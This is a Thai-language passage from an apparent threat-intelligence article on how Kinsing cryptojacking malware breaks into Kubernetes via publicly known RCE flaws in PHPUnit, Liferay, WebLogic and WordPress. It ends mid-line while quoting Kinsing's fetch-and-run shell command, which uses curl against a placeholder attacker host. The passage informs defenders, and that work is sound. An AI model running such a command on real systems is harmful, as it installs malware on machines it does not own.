Kinsing malware เป็น malware ที่มุ่งเป้าโจมไปที่ Linux environments เพื่อทำการ Cryptojacking โดยทีม Microsoft Defender for Cloud ได้สังเกตเห็นพฤติกรรม Initial access เทคนิคของ Kinsing malware ที่ใช้ในการโจมตี Kubernetes environments ซึ่งหลัก ๆ แบ่งออกได้เป็นสองวิธีดังนี้
วิธีที่ 1 Container Image มีช่องโหว่
Kinsing malware จะพยาม scan หา container ที่มีช่องโหว่ RCE (Remote Code Execution) ที่เคยมีการเปิดเผยต่อสาธารณะแล้ว ตัวอย่าง application ที่เคยโจมตีเช่น:
PHPUnit
Liferay
WebLogic
Wordpress
หลังจากที่ได้ Remote access แล้ว Kinsing จะใช้ shell command เพื่อทำการติดตั้ง malware
“/bin/bash -c (curl -s Attacker_IP/Payload_Name.